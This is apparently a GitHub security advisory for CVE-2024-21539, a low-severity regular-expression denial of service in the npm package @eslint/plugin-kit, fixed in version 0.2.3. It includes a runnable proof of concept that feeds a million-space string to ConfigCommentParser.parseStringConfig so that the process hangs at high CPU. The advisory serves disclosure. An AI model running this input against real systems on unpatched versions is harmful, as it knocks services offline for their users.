Skip to content

Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit

Low
mdjermanovic published GHSA-7q7g-4xm8-89cq Nov 15, 2024

Package

npm @eslint/plugin-kit (npm)

Affected versions

*

Patched versions

0.2.3

Description

Crafting a very large and well crafted string can increase the CPU usage and crash the program.

POC

const { ConfigCommentParser } = require("@eslint/plugin-kit");

var str = "";
for (var i = 0; i < 1000000; i++) {
  str += " ";
}
str += "A";

console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseStringConfig(str, ""));
console.log("end")

// run `npm i @eslint/plugin-kit` and `node attack.js` 
// then the program will stuck forever with high CPU usage

Severity

Low

CVE ID

CVE-2024-21539

Weaknesses

No CWEs

Credits